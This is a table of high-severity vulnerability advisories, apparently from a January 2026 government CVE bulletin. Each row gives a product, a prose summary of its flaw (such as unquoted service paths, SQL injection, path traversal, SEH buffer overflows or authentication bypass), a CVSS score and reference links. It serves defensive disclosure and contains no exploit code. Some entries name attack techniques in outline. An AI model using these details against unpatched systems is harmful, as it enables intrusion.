| Disksorter--Disk Sorter Server | Disk Sorter Server 13.6.12 contains an unquoted service path vulnerability in its binary path configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\Program Files\Disk Sorter Server\bin\disksrs.exe' to inject malicious executables and escalate privileges. | 2026-01-16 | 7.8 | CVE-2021-47847 | ExploitDB-50013 Vendor Homepage VulnCheck Advisory: Disk Sorter Server 13.6.12 - 'Disk Sorter Server' Unquoted Service Path |
| divisupreme--Supreme Modules Lite Divi Theme, Extra Theme and Divi Builder | The Supreme Modules Lite plugin for WordPress is vulnerable to arbitrary file upload in all versions up to, and including, 2.5.62. This is due to insufficient file type validation detecting JSON files, allowing double extension files to bypass sanitization while being accepted as a valid JSON file. This makes it possible for authenticated attackers, with author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2026-01-15 | 8.8 | CVE-2025-13062 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1819f2eb-51ef-4ba4-9137-ab64710fa6c8?source=cve https://plugins.trac.wordpress.org/changeset/3423427/supreme-modules-for-divi |
| docmost--docmost | Docmost is an open-source collaborative wiki and documentation software. From 0.21.0 to before 0.24.0, Docmost is vulnerable to Arbitrary File Write via the Zip Import Feature (ZipSlip). In apps/server/src/integrations/import/utils/file.utils.ts, there is no validation of the filename. This vulnerability is fixed in 0.24.0. | 2026-01-15 | 7.1 | CVE-2026-22249 | https://github.com/docmost/docmost/security/advisories/GHSA-54pm-hqxm-54wg https://github.com/docmost/docmost/pull/1753 https://github.com/docmost/docmost/commit/c3b350d943108552e20654580005cd6f6c78ab05 https://github.com/docmost/docmost/releases/tag/v0.24.0 |
| Dolibarr--CRM | Dolibarr ERP-CRM 14.0.2 contains a stored cross-site scripting vulnerability in the ticket creation module that allows low-privilege users to inject malicious scripts. Attackers can craft a specially designed ticket message with embedded JavaScript that triggers when an administrator copies the text, potentially enabling privilege escalation. | 2026-01-15 | 7.2 | CVE-2021-47779 | ExploitDB-50432 Official Dolibarr Vendor Homepage Dolibarr GitHub Repository VulnCheck Advisory: Dolibarr ERP-CRM 14.0.2 - Stored Cross-Site Scripting (XSS) / Privilege Escalation |
| donknap--dpanel | DPanel is an open source server management panel written in Go. Prior to 1.9.2, DPanel has an arbitrary file deletion vulnerability in the /api/common/attach/delete interface. Authenticated users can delete arbitrary files on the server via path traversal. When a user logs into the administrative backend, this interface can be used to delete files. The vulnerability lies in the Delete function within the app/common/http/controller/attach.go file. The path parameter submitted by the user is directly passed to storage.Local{}.GetSaveRealPath and subsequently to os.Remove without proper sanitization or checking for path traversal characters (../). The helper function in common/service/storage/local.go uses filepath.Join, which resolves ../ but does not enforce a chroot/jail. This vulnerability is fixed in 1.9.2. | 2026-01-15 | 8.1 | CVE-2025-66292 | https://github.com/donknap/dpanel/security/advisories/GHSA-vh2x-fw87-4fxq https://github.com/donknap/dpanel/commit/cbda0d90204e8212f2010774345c952e42069119 https://github.com/donknap/dpanel/releases/tag/v1.9.2 |
| Dupscout--Dup Scout | Dup Scout 13.5.28 contains an unquoted service path vulnerability in its Windows service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\Program Files\Dup Scout Server\bin\dupscts.exe' to inject malicious executables and escalate privileges. | 2026-01-15 | 7.8 | CVE-2021-47806 | ExploitDB-50025 Vendor Homepage VulnCheck Advisory: Dup Scout 13.5.28 - 'Multiple' Unquoted Service Path |
| dupterminator--DupTerminator | DupTerminator 1.4.5639.37199 contains a denial of service vulnerability that allows attackers to crash the application by inputting a long character string in the Excluded text box. Attackers can generate a payload of 8000 repeated characters to trigger the application to stop working on Windows 10. | 2026-01-16 | 7.5 | CVE-2021-47818 | ExploitDB-49917 DupTerminator Project Homepage VulnCheck Advisory: DupTerminator 1.4.5639.37199 - Denial of Service |
| dvcrn--Markright | Markright 1.0 contains a persistent cross-site scripting vulnerability that allows attackers to embed malicious payloads in markdown files. Attackers can upload specially crafted markdown files that execute arbitrary JavaScript when opened, potentially enabling remote code execution on the victim's system. | 2026-01-16 | 7.2 | CVE-2021-47838 | ExploitDB-49834 Markright GitHub Repository Proof of Concept Video VulnCheck Advisory: Markright 1.0 - Persistent Cross-Site Scripting |
| Dynojet--Dynojet Power Core | Dynojet Power Core 2.3.0 contains an unquoted service path vulnerability in the DJ.UpdateService that allows local authenticated users to potentially execute code with elevated privileges. Attackers can exploit the unquoted binary path by placing malicious executables in the service's file path to gain Local System access. | 2026-01-15 | 7.8 | CVE-2021-47773 | ExploitDB-50466 Official Vendor Homepage |
| E107--e107 CMS | e107 CMS version 3.2.1 contains a critical file upload vulnerability that allows authenticated administrators to override arbitrary server files through path traversal. The vulnerability exists in the Media Manager's remote URL upload functionality (image.php) where the upload_caption parameter is not properly sanitized. An attacker with administrative privileges can use directory traversal sequences (../../../) in the upload_caption field to overwrite critical system files outside the intended upload directory. This can lead to complete compromise of the web application by overwriting configuration files, executable scripts, or other critical system components. The vulnerability was discovered by Hubert Wojciechowski and affects the image.php component in the admin interface. | 2026-01-13 | 7.2 | CVE-2022-50939 | ExploitDB-50910 Official Vendor Homepage Software Download Page VulnCheck Advisory: e107 CMS v3.2.1 - Upload Restriction Bypass with Path Traversal File Override |
| e107--e107 CMS | e107 CMS version 3.2.1 contains multiple vulnerabilities that allow cross-site scripting (XSS) attacks. The first vulnerability is a reflected XSS that occurs in the news comment functionality when authenticated users interact with the comment form. An attacker can inject malicious JavaScript code through the URL parameter that gets executed when users click outside the comment field after typing content. The second vulnerability involves an upload restriction bypass for authenticated administrators, allowing them to upload SVG files containing malicious code through the media manager's remote URL upload feature. This results in stored XSS when the uploaded SVG files are accessed. These vulnerabilities were discovered by Hubert Wojciechowski and affect the news.php and image.php components of the CMS. | 2026-01-13 | 9.8 | CVE-2022-50905 | ExploitDB-50910 Official Vendor Homepage Software Download Page VulnCheck Advisory: e107 CMS v3.2.1 - Reflected XSS via Comment Flow |
| e107--e107 CMS | e107 CMS version 3.2.1 contains a file upload vulnerability that allows authenticated administrative users to bypass upload restrictions and execute PHP files. Attackers can upload malicious PHP files to parent directories by manipulating the upload URL parameter, enabling remote code execution through the Media Manager import feature. | 2026-01-13 | 7.2 | CVE-2022-50907 | ExploitDB-50910 Official e107 CMS Vendor Homepage e107 CMS Download Page VulnCheck Advisory: e107 CMS v3.2.1 - Admin Upload Restriction Bypass + RCE |
| e107--e107 CMS | e107 CMS version 3.2.1 contains a file upload vulnerability that allows authenticated administrators to override server files through the Media Manager import functionality. Attackers can exploit the upload mechanism by manipulating the upload URL parameter to overwrite existing files like top.php in the web application directory. | 2026-01-13 | 7.2 | CVE-2022-50916 | ExploitDB-50910 Official Vendor Homepage Software Download Page VulnCheck Advisory: e107 CMS v3.2.1 - Upload restriction bypass (Authenticated [Admin])+ Server file override |
| EaseUS--EaseUS Data Recovery | EaseUS Data Recovery 15.1.0.0 contains an unquoted service path vulnerability in the EaseUS UPDATE SERVICE executable. Attackers can exploit the unquoted path to inject and execute malicious code with elevated LocalSystem privileges. | 2026-01-13 | 8.4 | CVE-2022-50914 | ExploitDB-50886 EaseUS Official Homepage VulnCheck Advisory: EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path |
| Elastic--Kibana | External Control of File Name or Path (CWE-73) combined with Server-Side Request Forgery (CWE-918) can allow an attacker to cause arbitrary file disclosure through a specially crafted credentials JSON payload in the Google Gemini connector configuration. This requires an attacker to have authenticated access with privileges sufficient to create or modify connectors (Alerts & Connectors: All). The server processes a configuration without proper validation, allowing for arbitrary network requests and for arbitrary file reads. | 2026-01-14 | 8.6 | CVE-2026-0532 | https://discuss.elastic.co/t/kibana-8-19-10-9-1-10-9-2-4-security-update-esa-2026-05/384524 |
| Emerson--Emerson PAC Machine Edition | Emerson PAC Machine Edition 9.80 contains an unquoted service path vulnerability in the TrapiServer service that allows local users to potentially execute code with elevated privileges. Attackers can exploit the unquoted path in the service configuration to inject malicious code that would execute with LocalSystem permissions during service startup. | 2026-01-13 | 8.4 | CVE-2022-50930 | ExploitDB-50745 Emerson Official Homepage Software Download Link VulnCheck Advisory: Emerson PAC Machine Edition 9.80 Build 8695 - 'TrapiServer' Unquoted Service Path |
| En--Kingdia CD Extractor | Kingdia CD Extractor 3.0.2 contains a buffer overflow vulnerability in the registration name field that allows attackers to execute arbitrary code. Attackers can craft a malicious payload exceeding 256 bytes to overwrite Structured Exception Handler and gain remote code execution through a bind shell. | 2026-01-15 | 9.8 | CVE-2021-47774 | ExploitDB-50470 Software Download Page |
| envoyproxy--gateway | Envoy Gateway is an open source project for managing Envoy Proxy as a standalone or Kubernetes-based application gateway. Prior to 1.5.7 and 1.6.2, EnvoyExtensionPolicy Lua scripts executed by Envoy proxy can be used to leak the proxy's credentials. These credentials can then be used to communicate with the control plane and gain access to all secrets that are used by Envoy proxy, e.g. TLS private keys and credentials used for downstream and upstream communication. This vulnerability is fixed in 1.5.7 and 1.6.2. | 2026-01-12 | 8.8 | CVE-2026-22771 | https://github.com/envoyproxy/gateway/security/advisories/GHSA-xrwg-mqj6-6m22 |
| Epic Games--Epic Games Store | A local privilege escalation vulnerability exists during the installation of Epic Games Store via the Microsoft Store. A low-privilege user can replace a DLL file during the installation process, which may result in unintended elevation of privileges. | 2026-01-15 | 8.8 | CVE-2025-61973 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2279 |
| Explorerplusplus--Explorer32++ | Explorer32++ 1.3.5.531 contains a buffer overflow vulnerability in Structured Exception Handler (SEH) records that allows attackers to execute arbitrary code. Attackers can exploit the vulnerability by providing a long file name argument over 396 characters to corrupt the SEH chain and potentially execute malicious code. | 2026-01-13 | 9.8 | CVE-2023-54334 | ExploitDB-51077 Archived Explorer++ Website VulnCheck Advisory: Explorer32++ 1.3.5.531 - Buffer overflow |
| Extplorer--eXtplorer | eXtplorer 2.1.14 contains an authentication bypass vulnerability that allows attackers to login without a password by manipulating the login request. Attackers can exploit this flaw to upload malicious PHP files and execute remote commands on the vulnerable file management system. | 2026-01-13 | 9.8 | CVE-2023-54335 | ExploitDB-51067 Official eXtplorer Product Homepage VulnCheck Advisory: eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE) |
| FeMiner--wms | A security vulnerability has been detected in FeMiner wms up to 9cad1f1b179a98b9547fd003c23b07c7594775fa. Affected by this vulnerability is an unknown functionality of the file /src/chkuser.php. The manipulation of the argument Username leads to SQL injection. The attack can be carried out remotely. The exploit has been disclosed publicly and may be used. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-17 | 7.3 | CVE-2026-1059 | VDB-341628 (FeMiner wms chkuser.php sql injection), CTI Indicators (IOB, IOC, TTP, IOA), Submit #731236 (GitHub WMS (Warehouse Management System) V1.0 SQL Injection) https://github.com/wangchaoxing/CVE/issues/1 |
| FmeAddons--Registration & Login with Mobile Phone Number for WooCommerce | The Registration & Login with Mobile Phone Number for WooCommerce plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.3.1. This is due to the plugin not properly verifying a user's identity prior to authenticating them via the fma_lwp_set_session_php_fun() function. This makes it possible for unauthenticated attackers to authenticate as any user on the site, including administrators, without a valid password. | 2026-01-17 | 9.8 | CVE-2025-10484 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6aef6fbb-be8c-49e1-ada5-7b4aa8b2ff72?source=cve https://woocommerce.com/products/registration-login-with-mobile-phone-number/ |
| Fortinet--FortiFone | An exposure of sensitive information to an unauthorized actor [CWE-200] vulnerability in Fortinet FortiFone 7.0.0 through 7.0.1, FortiFone 3.0.13 through 3.0.23 allows an unauthenticated attacker to obtain the device configuration via crafted HTTP or HTTPS requests. | 2026-01-13 | 9.3 | CVE-2025-47855 | https://fortiguard.fortinet.com/psirt/FG-IR-25-260 |
| Fortinet--FortiSIEM | An improper neutralization of special elements used in an os command ('os command injection') vulnerability in Fortinet FortiSIEM 7.4.0, FortiSIEM 7.3.0 through 7.3.4, FortiSIEM 7.1.0 through 7.1.8, FortiSIEM 7.0.0 through 7.0.4, FortiSIEM 6.7.0 through 6.7.10 may allow an attacker to execute unauthorized code or commands via crafted TCP requests. | 2026-01-13 | 9.4 | CVE-2025-64155 | https://fortiguard.fortinet.com/psirt/FG-IR-25-772 |
| Fortinet--FortiSwitchManager | A heap-based buffer overflow vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2.0 through 7.2.11, FortiOS 7.0.0 through 7.0.17, FortiOS 6.4.0 through 6.4.16, FortiSwitchManager 7.2.0 through 7.2.6, FortiSwitchManager 7.0.0 through 7.0.5 allows an attacker to execute unauthorized code or commands via specially crafted packets. | 2026-01-13 | 7.4 | CVE-2025-25249 | https://fortiguard.fortinet.com/psirt/FG-IR-25-084 |
| Freeter--Freeter | Freeter 1.2.1 contains a persistent cross-site scripting vulnerability that allows attackers to store malicious payloads in custom widget titles and files. Attackers can craft malicious files with embedded scripts that execute when victims interact with the application, potentially enabling remote code execution. | 2026-01-16 | 7.2 | CVE-2021-47835 | ExploitDB-49833 Official Freeter Product Homepage Proof of Concept Video VulnCheck Advisory: Freeter 1.2.1 - Persistent Cross-Site Scripting |
| Gearboxcomputers--WifiHotSpot | WifiHotSpot 1.0.0.0 contains an unquoted service path vulnerability in its WifiHotSpotService.exe that allows local attackers to execute code with elevated privileges. Attackers can exploit the unquoted path during system startup or reboot to inject and run malicious executables with LocalSystem permissions. | 2026-01-16 | 7.8 | CVE-2021-47833 | ExploitDB-49845 WiFi Hotspot Product Page VulnCheck Advisory: WifiHotSpot 1.0.0.0 - 'WifiHotSpotService.exe' Unquoted Service Path |
| getarcaneapp--arcane | Arcane provides modern docker management. Prior to 1.13.0, Arcane has a command injection in the updater service. Arcane's updater service supported lifecycle labels com.getarcaneapp.arcane.lifecycle.pre-update and com.getarcaneapp.arcane.lifecycle.post-update that allowed defining a command to run before or after a container update. The label value is passed directly to /bin/sh -c without sanitization or validation. Because any authenticated user (not limited to administrators) can create projects through the API, an attacker can create a project that specifies one of these lifecycle labels with a malicious command. When an administrator later triggers a container update (either manually or via scheduled update checks), Arcane reads the lifecycle label and executes its value as a shell command inside the container. This vulnerability is fixed in 1.13.0. | 2026-01-15 | 9.1 | CVE-2026-23520 | https://github.com/getarcaneapp/arcane/security/advisories/GHSA-gjqq-6r35-w3r8 https://github.com/getarcaneapp/arcane/pull/1468 https://github.com/getarcaneapp/arcane/commit/5a9c2f92e11f86f8997da8c672844468f930b7e4 https://github.com/getarcaneapp/arcane/releases/tag/v1.13.0 |
| Getgrav--GravCMS | GravCMS 1.10.7 contains an unauthenticated vulnerability that allows remote attackers to write arbitrary YAML configuration and execute PHP code through the scheduler endpoint. Attackers can exploit the admin-nonce parameter to inject base64-encoded payloads and create malicious custom jobs with system command execution. | 2026-01-15 | 7.5 | CVE-2021-47812 | ExploitDB-49973 Official Grav CMS Homepage VulnCheck Advisory: GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2) |
| Getoutline--Outline | Outline 1.6.0 contains an unquoted service path vulnerability that allows local attackers to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted service path in the OutlineService executable to inject malicious code that will be executed with LocalSystem permissions. | 2026-01-13 | 8.4 | CVE-2023-54331 | ExploitDB-51128 Official Outline Product Homepage VulnCheck Advisory: Outline 1.6.0 - Unquoted Service Path |
| Github--Sandboxie Plus | Sandboxie Plus 0.7.4 contains an unquoted service path vulnerability in the SbieSvc service that allows local attackers to execute code with elevated privileges. Attackers can exploit the unquoted path during system startup or reboot to inject and run malicious executables with LocalSystem permissions. | 2026-01-16 | 7.8 | CVE-2021-47832 | ExploitDB-49842 Sandboxie Plus GitHub Repository VulnCheck Advisory: Sandboxie Plus 0.7.4 - 'SbieSvc' Unquoted Service Path |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.10 before 18.3.6, 18.4 before 18.4.4, and 18.5 before 18.5.2 that could have allowed an authenticated user to execute stored cross-site scripting through improper input validation in the Kubernetes proxy functionality. | 2026-01-14 | 7.7 | CVE-2025-11224 | https://about.gitlab.com/releases/2025/11/12/patch-release-gitlab-18-5-2-released/ GitLab Issue #573223 HackerOne Bug Bounty Report #3277291 |
| glpi-project--glpi | GLPI is a free asset and IT management software package. Prior to 10.0.21 and 11.0.3, an unauthorized user can access GLPI documents attached to any item (ticket, asset, ...). If the public FAQ is enabled, this unauthorized access can be performed by an anonymous user. This vulnerability is fixed in 10.0.21 and 11.0.3. | 2026-01-15 | 7.5 | CVE-2025-64516 | https://github.com/glpi-project/glpi/security/advisories/GHSA-487h-7mxm-7r46 https://github.com/glpi-project/glpi/commit/51412a89d3174cfe22967b051d527febdbceab3c https://github.com/glpi-project/glpi/commit/ee7ee28e0645198311c0a9e0c4e4b712b8788e27 https://github.com/glpi-project/glpi/releases/tag/10.0.21 https://github.com/glpi-project/glpi/releases/tag/11.0.3 |
| glpi-project--glpi | GLPI is a free asset and IT management software package. From 11.0.0 to before 11.0.3, an unauthenticated user can perform a SQL injection through the inventory endpoint. This vulnerability is fixed in 11.0.3. | 2026-01-15 | 7.5 | CVE-2025-66417 | https://github.com/glpi-project/glpi/security/advisories/GHSA-p467-682w-9cc9 |
| Gotac--Police Statistics Database System | Police Statistics Database System developed by Gotac has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality. | 2026-01-16 | 9.8 | CVE-2026-1019 | https://www.twcert.org.tw/tw/cp-132-10637-3e4b3-1.html https://www.twcert.org.tw/en/cp-139-10638-0e44b-2.html |
| Gotac--Police Statistics Database System | Police Statistics Database System developed by Gotac has an Arbitrary File Upload vulnerability, allowing unauthenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server. | 2026-01-16 | 9.8 | CVE-2026-1021 | https://www.twcert.org.tw/tw/cp-132-10637-3e4b3-1.html https://www.twcert.org.tw/en/cp-139-10638-0e44b-2.html |
| Gotac--Police Statistics Database System | Police Statistics Database System developed by Gotac has an Arbitrary File Read vulnerability, allowing unauthenticated remote attackers to exploit absolute path traversal to download arbitrary system files. | 2026-01-16 | 7.5 | CVE-2026-1018 | https://www.twcert.org.tw/tw/cp-132-10637-3e4b3-1.html https://www.twcert.org.tw/en/cp-139-10638-0e44b-2.html |
| Gotac--Statistics Database System | Statistics Database System developed by Gotac has an Arbitrary File Read vulnerability, allowing unauthenticated remote attackers to exploit relative path traversal to download arbitrary system files. | 2026-01-16 | 7.5 | CVE-2026-1022 | https://www.twcert.org.tw/tw/cp-132-10639-813ad-1.html https://www.twcert.org.tw/en/cp-139-10640-0fd0b-2.html |
| Gotac--Statistics Database System | Statistics Database System developed by Gotac has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to directly exploit a specific functionality to query database contents. | 2026-01-16 | 7.5 | CVE-2026-1023 | https://www.twcert.org.tw/tw/cp-132-10639-813ad-1.html https://www.twcert.org.tw/en/cp-139-10640-0fd0b-2.html |
| Grocerycrud--Grocery crud | Grocery Crud 1.6.4 contains a SQL injection vulnerability in the order_by parameter that allows remote attackers to manipulate database queries. Attackers can inject malicious SQL code through the order_by[] parameter in POST requests to the ajax_list endpoint to potentially extract or modify database information. | 2026-01-15 | 8.2 | CVE-2021-47811 | ExploitDB-49985 Vendor Homepage Software Download Page VulnCheck Advisory: Grocery crud 1.6.4 - 'order_by' SQL Injection |
| h3js--h3 | H3 is a minimal H(TTP) framework built for high performance and portability. Prior to 1.15.5, there is a critical HTTP Request Smuggling vulnerability. readRawBody is doing a strict case-sensitive check for the Transfer-Encoding header. It explicitly looks for "chunked", but per the RFC, this header should be case-insensitive. This vulnerability is fixed in 1.15.5. | 2026-01-15 | 8.9 | CVE-2026-23527 | https://github.com/h3js/h3/security/advisories/GHSA-mp2g-9vg9-f4cg https://github.com/h3js/h3/commit/618ccf4f37b8b6148bea7f36040471af45bfb097 |
| HCL Software--MyXalytics | HCL MyXalytics v6.7 is affected by improper management of a static JWT signing secret in the web application, where the secret lacks rotation, introducing a security risk. | 2026-01-16 | 7.4 | CVE-2025-59870 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128115 |
| Hewlett Packard Enterprise (HPE)--ArubaOS (AOS) | An arbitrary file deletion vulnerability has been identified in a system function of mobility conductors running the AOS-8 operating system. Successful exploitation of this vulnerability could allow an unauthenticated remote malicious actor to delete arbitrary files within the affected system and potentially result in denial-of-service conditions on affected devices. | 2026-01-13 | 8.2 | CVE-2025-37168 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--ArubaOS (AOS) | A stack overflow vulnerability exists in the AOS-10 web-based management interface of a Mobility Gateway. Successful exploitation could allow an authenticated malicious actor to execute arbitrary code as a privileged user on the underlying operating system. | 2026-01-13 | 7.2 | CVE-2025-37169 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--ArubaOS (AOS) | Authenticated command injection vulnerabilities exist in the web-based management interface of mobility conductors running AOS-8 operating system. Successful exploitation could allow an authenticated malicious actor to execute arbitrary commands as a privileged user on the underlying operating system. | 2026-01-13 | 7.2 | CVE-2025-37170 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--ArubaOS (AOS) | Authenticated command injection vulnerabilities exist in the web-based management interface of mobility conductors running AOS-8 operating system. Successful exploitation could allow an authenticated malicious actor to execute arbitrary commands as a privileged user on the underlying operating system. | 2026-01-13 | 7.2 | CVE-2025-37171 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--ArubaOS (AOS) | Authenticated command injection vulnerabilities exist in the web-based management interface of mobility conductors running AOS-8 operating system. Successful exploitation could allow an authenticated malicious actor to execute arbitrary commands as a privileged user on the underlying operating system. | 2026-01-13 | 7.2 | CVE-2025-37172 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--ArubaOS (AOS) | An improper input handling vulnerability exists in the web-based management interface of mobility conductors running either AOS-10 or AOS-8 operating systems. Successful exploitation could allow an authenticated malicious actor with valid credentials to trigger unintended behavior on the affected system. | 2026-01-13 | 7.2 | CVE-2025-37173 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--ArubaOS (AOS) | An authenticated arbitrary file write vulnerability exists in the web-based management interface of mobility conductors running either AOS-10 or AOS-8 operating systems. Successful exploitation could allow an authenticated malicious actor to create or modify arbitrary files and execute arbitrary commands as a privileged user on the underlying operating system. | 2026-01-13 | 7.2 | CVE-2025-37174 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--ArubaOS (AOS) | An arbitrary file upload vulnerability exists in the web-based management interface of mobility conductors running either AOS-10 or AOS-8 operating systems. Successful exploitation could allow an authenticated malicious actor to upload arbitrary files as a privileged user and execute arbitrary commands on the underlying operating system. | 2026-01-13 | 7.2 | CVE-2025-37175 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--EdgeConnect SD-WAN Orchestrator | Vulnerabilities in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an authenticated remote attacker to perform SQL injection attacks. Successful exploitation could allow an attacker to execute arbitrary SQL commands on the underlying database, potentially leading to unauthorized data access or data manipulation. | 2026-01-14 | 7.2 | CVE-2025-37181 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04992en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--EdgeConnect SD-WAN Orchestrator | Vulnerabilities in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an authenticated remote attacker to perform SQL injection attacks. Successful exploitation could allow an attacker to execute arbitrary SQL commands on the underlying database, potentially leading to unauthorized data access or data manipulation. | 2026-01-14 | 7.2 | CVE-2025-37182 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04992en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--EdgeConnect SD-WAN Orchestrator | Vulnerabilities in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an authenticated remote attacker to perform SQL injection attacks. Successful exploitation could allow an attacker to execute arbitrary SQL commands on the underlying database, potentially leading to unauthorized data access or data manipulation. | 2026-01-14 | 7.2 | CVE-2025-37183 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04992en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--Instant On | A vulnerability in the router mode configuration of HPE Instant On Access Points exposed certain network configuration details to unintended interfaces. A malicious actor could gain knowledge of internal network configuration details through inspecting impacted packets. | 2026-01-13 | 7.5 | CVE-2025-37165 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04988en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--Instant On | A vulnerability affecting HPE Networking Instant On Access Points has been identified where a device processing a specially crafted packet could enter a non-responsive state, in some cases requiring a hard reset to re-establish services. A malicious actor could leverage this vulnerability to conduct a Denial-of-Service attack on a target network. | 2026-01-13 | 7.5 | CVE-2025-37166 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04988en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--Virtual Intranet Access (VIA) | A local privilege-escalation vulnerability has been discovered in the HPE Aruba Networking Virtual Intranet Access (VIA) client. Successful exploitation of this vulnerability could allow a local attacker to achieve arbitrary code execution with root privileges. | 2026-01-13 | 7.8 | CVE-2025-37186 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04994en_us&docLocale=en_US |
| Hikvision--DS-96xxxNI-Hx | There is a stack overflow vulnerability in the device Search and Discovery feature of Hikvision NVR/DVR/CVR/IPC models. If exploited, an attacker on the same local area network (LAN) could cause the device to malfunction by sending specially crafted packets to an unpatched device. | 2026-01-13 | 8.8 | CVE-2025-66177 | https://www.hikvision.com/en/support/cybersecurity/security-advisory/buffer-overflow-vulnerabilities-in-some-hikvision-products/ |
| Hikvision--DS-K1T331 | There is a stack overflow vulnerability in the device Search and Discovery feature of Hikvision Access Control Products. If exploited, an attacker on the same local area network (LAN) could cause the device to malfunction by sending specially crafted packets to an unpatched device. | 2026-01-13 | 8.8 | CVE-2025-66176 | https://www.hikvision.com/en/support/cybersecurity/security-advisory/buffer-overflow-vulnerabilities-in-some-hikvision-products/ |
| honojs--hono | Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.11.4, a flaw in Hono's JWK/JWKS JWT verification middleware allowed the JWT header's alg value to influence signature verification when the selected JWK did not explicitly specify an algorithm. This could enable JWT algorithm confusion and, in certain configurations, allow forged tokens to be accepted. As part of this fix, the JWT middleware now requires the alg option to be explicitly specified. This prevents algorithm confusion by ensuring that the verification algorithm is not derived from untrusted JWT header values. This vulnerability is fixed in 4.11.4. | 2026-01-13 | 8.2 | CVE-2026-22817 | https://github.com/honojs/hono/security/advisories/GHSA-f67f-6cw9-8mq4 https://github.com/honojs/hono/commit/cc0aa7ae327ed84cc391d29086dec2a3e44e7a1f |
| honojs--hono | Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.11.4, a flaw in Hono's JWK/JWKS JWT verification middleware allowed the algorithm specified in the JWT header to influence signature verification when the selected JWK did not explicitly define an algorithm. This could enable JWT algorithm confusion and, in certain configurations, allow forged tokens to be accepted. The JWK/JWKS JWT verification middleware has been updated to require an explicit allowlist of asymmetric algorithms when verifying tokens. The middleware no longer derives the verification algorithm from untrusted JWT header values. This vulnerability is fixed in 4.11.4. | 2026-01-13 | 8.2 | CVE-2026-22818 | https://github.com/honojs/hono/security/advisories/GHSA-3vhc-576x-3qv4 https://github.com/honojs/hono/commit/190f6e28e2ca85ce3d1f2f54db1310f5f3eab134 |
| Httpdebugger--HTTPDebuggerPro | HTTPDebuggerPro 9.11 contains an unquoted service path vulnerability that allows local attackers to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted binary path in the service configuration to inject malicious executables and gain elevated access to the system. | 2026-01-15 | 7.8 | CVE-2021-47762 | ExploitDB-50545 Official Product Homepage |
| Huawei--HarmonyOS | Multi-thread race condition vulnerability in the card framework module. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-01-14 | 8 | CVE-2025-68955 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinlaptops/2026/1// https://consumer.huawei.com/en/support/bulletinwearables/2026/1/ |
| Huawei--HarmonyOS | Multi-thread race condition vulnerability in the card framework module. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-01-14 | 8 | CVE-2025-68956 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinlaptops/2026/1// https://consumer.huawei.com/en/support/bulletinwearables/2026/1/ |
| Huawei--HarmonyOS | Multi-thread race condition vulnerability in the card framework module. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-01-14 | 8.4 | CVE-2025-68957 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinlaptops/2026/1// https://consumer.huawei.com/en/support/bulletinwearables/2026/1/ |
